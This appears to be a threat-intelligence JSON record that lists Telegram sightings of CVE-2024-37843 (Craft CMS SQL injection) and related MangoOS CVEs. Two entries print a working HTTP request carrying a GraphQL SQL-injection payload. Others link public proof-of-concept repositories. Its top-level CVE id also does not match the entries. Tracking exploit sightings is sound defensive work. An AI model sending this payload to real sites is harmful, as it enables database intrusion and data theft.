{"vulnerability": "CVE-2024-3784", "sightings": [{"uuid": "bacbd21d-2b85-4583-b50b-e81d933f0fbb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-37843", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2941", "content": "CraftCMS SQL CVE-2024-37843\n\nPOST /api/ HTTP/1.1\nHost: 127.0.0.1\n\n{\"query\":\"query  IntrospectionQuery  {assets(orderBy: \\\"assets.volumeId,extractvalue(1,concat(0x0a,concat('{{1}}',version()))) --\\\", limit: 5){filename}}\"}\n\n#exploit #poc #SQL", "creation_timestamp": "2024-08-02T17:15:54.000000Z"}, {"uuid": "cdc11837-9a64-456b-abc2-f9ab4a868aee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-37843", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/2945", "content": "https://github.com/gsmith257-cyber/CVE-2024-37843-POC\n\nPOC for CVE-2024-37843. Craft CMS time-based blind SQLi\n#github #poc #SQL", "creation_timestamp": "2024-08-05T03:25:02.000000Z"}, {"uuid": "f9777920-c77c-43d7-a584-439998eb2212", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-37843", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/10932", "content": "#exploit\n1. HEVD Exploit:\nBufferOverflowNonPagedPoolNx on Win10 22H2 - Escalating from Low Integrity to SYSTEM via Aligned Chunk Confusion\nhttps://github.com/ommadawn46/HEVD-BufferOverflowNonPagedPoolNx-Win10-22H2\n\n2. CVE-2024-37843:\nCraft CMS time-based blind SQLi\nhttps://github.com/gsmith257-cyber/CVE-2024-37843-POC", "creation_timestamp": "2024-08-04T16:46:18.000000Z"}, {"uuid": "6cee97e4-6a7f-4e6c-a436-286cc997edba", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-37843", "type": "published-proof-of-concept", "source": "https://t.me/Rootsec_2/3544", "content": "#exploit\n1. HEVD Exploit:\nBufferOverflowNonPagedPoolNx on Win10 22H2 - Escalating from Low Integrity to SYSTEM via Aligned Chunk Confusion\nhttps://github.com/ommadawn46/HEVD-BufferOverflowNonPagedPoolNx-Win10-22H2\n\n2. CVE-2024-37843:\nCraft CMS time-based blind SQLi\nhttps://github.com/gsmith257-cyber/CVE-2024-37843-POC", "creation_timestamp": "2024-08-16T11:19:37.000000Z"}, {"uuid": "49a8e55a-93ad-4343-a876-afd48e725c0f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-37843", "type": "published-proof-of-concept", "source": "https://t.me/ckeArsenal/142", "content": "CraftCMS SQL CVE-2024-37843\n\nPOST /api/ HTTP/1.1\nHost: 127.0.0.1\n\n{\"query\":\"query  IntrospectionQuery  {assets(orderBy: \\\"assets.volumeId,extractvalue(1,concat(0x0a,concat('{{1}}',version()))) --\\\", limit: 5){filename}}\"}\n\n#exploit #poc #SQL", "creation_timestamp": "2024-12-21T15:57:30.000000Z"}, {"uuid": "c3dac80a-0fc8-4c48-b153-5d9b04f34523", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-37843", "type": "published-proof-of-concept", "source": "https://t.me/ckeArsenal/144", "content": "https://github.com/gsmith257-cyber/CVE-2024-37843-POC\n\nPOC for CVE-2024-37843. Craft CMS time-based blind SQLi\n#github #poc #SQL", "creation_timestamp": "2024-12-21T15:57:30.000000Z"}, {"uuid": "f21de775-7a72-4681-9b50-2904d6938f24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-37843", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7693", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPOC for CVE-2024-37843. Craft CMS itm-based blind SQLi\nURL\uff1ahttps://github.com/gsmith257-cyber/CVE-2024-37843-POC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-18T02:30:04.000000Z"}, {"uuid": "32e47e22-daea-411b-b981-278df14e5d08", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-37843", "type": "published-proof-of-concept", "source": "https://t.me/HackerArsenal/114", "content": "#exploit\n1. HEVD Exploit:\nBufferOverflowNonPagedPoolNx on Win10 22H2 - Escalating from Low Integrity to SYSTEM via Aligned Chunk Confusion\nhttps://github.com/ommadawn46/HEVD-BufferOverflowNonPagedPoolNx-Win10-22H2\n\n2. CVE-2024-37843:\nCraft CMS time-based blind SQLi\nhttps://github.com/gsmith257-cyber/CVE-2024-37843-POC", "creation_timestamp": "2024-08-04T10:54:02.000000Z"}, {"uuid": "cebeff26-6a50-4a4a-8a51-2945bd67ccab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-37843", "type": "published-proof-of-concept", "source": "https://t.me/Kelvinseccommunity/699", "content": "#exploit\n1. HEVD Exploit:\nBufferOverflowNonPagedPoolNx on Win10 22H2 - Escalating from Low Integrity to SYSTEM via Aligned Chunk Confusion\nhttps://github.com/ommadawn46/HEVD-BufferOverflowNonPagedPoolNx-Win10-22H2\n\n2. CVE-2024-37843:\nCraft CMS time-based blind SQLi\nhttps://github.com/gsmith257-cyber/CVE-2024-37843-POC", "creation_timestamp": "2024-08-04T16:22:02.000000Z"}, {"uuid": "fe93ff33-ba51-4dff-8898-4d9725359315", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-37845", "type": "seen", "source": "https://t.me/cvedetector/8979", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-37845 - MangoOS Active Process Command RCE Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-37845 \nPublished : Oct. 25, 2024, 7:15 p.m. | 43\u00a0minutes ago \nDescription : MangoOS before 5.2.0 was discovered to contain an authenticated remote code execution (RCE) vulnerability via the Active Process Command feature. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"25 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-25T22:06:14.000000Z"}, {"uuid": "1ce781e4-a227-4685-bc66-4db9b4069f27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-37844", "type": "seen", "source": "https://t.me/cvedetector/8978", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-37844 - MangoOS Stored Cross-Site Scripting (XSS)\", \n  \"Content\": \"CVE ID : CVE-2024-37844 \nPublished : Oct. 25, 2024, 7:15 p.m. | 43\u00a0minutes ago \nDescription : A stored cross-site scripting (XSS) vulnerability in MangoOS before 5.2.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"25 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-25T22:06:13.000000Z"}, {"uuid": "63c49148-5828-4dc5-957f-9d6f78a1fbf3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-37847", "type": "seen", "source": "https://t.me/cvedetector/8976", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-37847 - MangoOS MangoAPI Remote Code Execution\", \n  \"Content\": \"CVE ID : CVE-2024-37847 \nPublished : Oct. 25, 2024, 7:15 p.m. | 43\u00a0minutes ago \nDescription : An arbitrary file upload vulnerability in MangoOS before 5.1.4 and Mango API before 4.5.5 allows attackers to execute arbitrary code via a crafted file. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"25 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-25T22:06:12.000000Z"}, {"uuid": "b0f039d8-a6ce-4510-bce7-a9486813f14c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-37846", "type": "seen", "source": "https://t.me/cvedetector/8975", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-37846 - MangoOS Client-Side Template Injection\", \n  \"Content\": \"CVE ID : CVE-2024-37846 \nPublished : Oct. 25, 2024, 7:15 p.m. | 43\u00a0minutes ago \nDescription : MangoOS before 5.2.0 was discovered to contain a Client-Side Template Injection (CSTI) vulnerability via the Platform Management Edit page. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"25 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-25T22:06:11.000000Z"}, {"uuid": "3e6426ae-55f8-4b6b-be92-1bf8846959de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-37843", "type": "published-proof-of-concept", "source": "Telegram/GAGweLsjUHO08v93h7Cnk4JIohd6mOph5G5IJ8nyyZIxNfo", "content": "", "creation_timestamp": "2024-09-08T07:41:49.000000Z"}]}